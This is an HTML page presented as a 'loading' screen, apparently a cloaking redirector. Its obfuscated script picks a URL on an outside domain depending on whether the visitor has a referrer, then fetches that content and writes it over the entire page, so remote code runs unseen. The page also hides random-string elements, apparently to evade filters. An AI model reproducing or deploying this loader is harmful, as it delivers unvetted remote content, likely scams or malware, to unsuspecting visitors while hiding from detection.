<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .IbY245a {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .IbY245a .uBIdCWpgu {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .IbY245a .content {
            line-height: 50px;
            text-align: center
        }

        .IbY245a .img {
            width: 100%
        }

        .IbY245a .JVTUyfmN {
            text-align: center
        }

        .IbY245a .JVTUyfmN span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .IbY245a .JVTUyfmN span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .IbY245a .JVTUyfmN span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .IbY245a .JVTUyfmN span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .IbY245a .JVTUyfmN span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .IbY245a .JVTUyfmN span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .IbY245a .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function hmm1sV6AJc1G(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var Ozfeln = hmm1sV6AJc1G('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ Ozfeln +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ Ozfeln +".html?a=share";
		}
		
        XywVRE998G=url+"#"+new Date().getTime();
        XywVRE998G && function() {
            $.get(XywVRE998G, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<h1 style='display:none' >iWksBaVjSagWvMiAqjObdQdhwvPCAUcdIqbvWCT8ca73qJeih5SNH09vPVEIdmFDY1rvfb4u3M</h1>
<li style='display:none' >djOgPyVW7Vg7LyqwrKTVtnTGy6rqJ5iQafUF6zgN3QMWJcC</li>
<span style='display:none'>vXqeAS71rbixach5Ejh9T27eFisn1IxszfX9rdZYD6jpVIXdcljSpPhtIeO00pX5TPVKjds1sRiooP0y</span>
<span style='display:none'>vXqeAS71rbixach5Ejh9T27eFisn1IxszfX9rdZYD6jpVIXdcljSpPhtIeO00pX5TPVKjds1sRiooP0y</span><div class="IbY245a">
    <div class="uBIdCWpgu">
        <div class="JVTUyfmN">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<li style='display:none' >agiDsjl22XiyZmSUMZrD9KRqTk219CJm0bQVzMYgM36WNgGv5a8xH6Iq48jOzKT2sBHV3hPYjf7q91</li>
<li style='display:none' >agiDsjl22XiyZmSUMZrD9KRqTk219CJm0bQVzMYgM36WNgGv5a8xH6Iq48jOzKT2sBHV3hPYjf7q91</li>
<b style='display:none' >wkPKMqEWEnuDHV1SMR2SQdJ19vVLqCyBAxtpsxqf4PegTIV5rwMhSzWt</b>
<div style='display:none'>awVEgOxhgGRy4DLxWcAQWh4LGopZ6g7gTaFzsSbfDUaCnqu5GNgxrgl6A2n4Mnpnq0lJKaOSxCfgN8wpy5HGiNFlgpUvK4</div>
<img  src='' style='display:none'>
<span style='display:none'>UVlNXSTsTZ22u6H1OKQ4rwI3MeaGB</span>
<b style='display:none' >wkPKMqEWEnuDHV1SMR2SQdJ19vVLqCyBAxtpsxqf4PegTIV5rwMhSzWt</b>
<b style='display:none' >wkPKMqEWEnuDHV1SMR2SQdJ19vVLqCyBAxtpsxqf4PegTIV5rwMhSzWt</b>
<div style='display:none'>awVEgOxhgGRy4DLxWcAQWh4LGopZ6g7gTaFzsSbfDUaCnqu5GNgxrgl6A2n4Mnpnq0lJKaOSxCfgN8wpy5HGiNFlgpUvK4</div></body>
</html>